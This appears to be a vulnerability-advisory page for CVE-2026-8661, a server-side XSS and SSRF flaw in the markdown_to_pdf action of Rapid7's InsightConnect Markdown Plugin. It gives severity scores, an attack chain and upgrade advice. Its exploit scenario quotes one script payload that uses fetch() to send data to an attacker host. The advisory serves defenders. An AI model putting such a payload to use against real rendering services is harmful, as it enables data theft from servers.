Skip to main content

InsightConnect Markdown Plugin EUVDEUVD-2026-39616

| CVE-2026-8661 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-26 rapid7 GHSA-6r62-qf74-xpgg
4.8
CVSS 3.1 · Vendor: rapid7
Share

Severity by source

Vendor (rapid7) PRIMARY
4.8 MEDIUM
AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
vuln.today AI
4.8 MEDIUM

Network-reachable PDF rendering action; high complexity from non-trivial payload requirements; no privileges or user interaction needed; limited to confidentiality and integrity impacts.

3.1 AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
4.0 AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (rapid7).

CVSS VectorVendor: rapid7

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 26, 2026 - 02:34 vuln.today
Analysis Generated
Jun 26, 2026 - 02:34 vuln.today
CVE Published
Jun 26, 2026 - 01:59 cve.org
MEDIUM 4.8

DescriptionCVE.org

Server-Side Cross-Site Scripting and Server-Side Request Forgery vulnerability in the markdown_to_pdf action of Rapid7 InsightConnect Markdown Plugin version 3.1.4 and earlier on Linux allows remote attackers to execute JavaScript server-side and make arbitrary outbound HTTP requests via crafted content embedded in Markdown input. The PDF rendering engine does not restrict script execution or outbound network access.

AnalysisAI

Server-side JavaScript execution and outbound HTTP request capabilities in Rapid7 InsightConnect Markdown Plugin versions 3.1.4 and earlier allow remote attackers to execute arbitrary scripts and make unauthorized HTTP requests through malicious content embedded in Markdown input to the markdown_to_pdf action. The PDF rendering engine lacks sufficient restrictions on script execution and network access. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Submit markdown with embedded malicious content
Delivery
Markdown converted to HTML with scripts
Exploit
PDF renderer executes JavaScript server-side
Execution
Make outbound HTTP requests to attacker
Impact
Exfiltrate data or inject malicious content

Vulnerability AssessmentAI

Exploitation The markdown_to_pdf action must be invoked with attacker-controlled or untrusted markdown content. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The moderate CVSS score (4.8) reflects network accessibility (AV:N) but high attack complexity (AC:H), indicating non-trivial exploitation conditions-likely requiring specific markdown syntax or rendering quirks to trigger. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with network access to an InsightConnect workflow submits a markdown document containing embedded JavaScript (e.g., `<script>fetch('http://attacker.com/steal?data=')</script>` or CSS resource references to external servers). When the markdown_to_pdf action processes the input, the PDF rendering engine executes the script in the server context, exfiltrating data via HTTP callbacks or making requests to attacker-controlled infrastructure. …
Remediation Upgrade Rapid7 InsightConnect Markdown Plugin to version 4.0.0 or later. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-39616 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy